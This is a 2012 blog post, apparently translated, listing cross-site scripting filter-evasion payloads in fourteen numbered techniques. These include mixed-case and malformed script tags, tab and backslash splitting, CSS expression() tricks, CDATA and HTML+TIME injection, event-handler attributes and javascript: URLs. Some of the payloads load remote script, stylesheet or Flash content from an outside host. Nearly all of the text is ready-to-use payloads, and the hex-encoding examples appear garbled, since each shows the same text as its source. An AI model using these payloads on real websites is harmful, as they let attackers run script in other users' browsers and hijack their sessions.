Introduction to Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change the character case:

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular expression check:

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another extension instead of .js:

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file:

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

    example:

        body {
            background-image: url('javascript:alert("XSS");')
        }

5. Insert other characters inside the script tag:

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a new line to evade (the gaps inside "javascript" below are a tab character in one form and a newline in the other; this copy has flattened them to spaces):

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade:

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped):

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event handler attributes):

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in a SWF file:

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it:

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME:

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META:

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href and url:

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>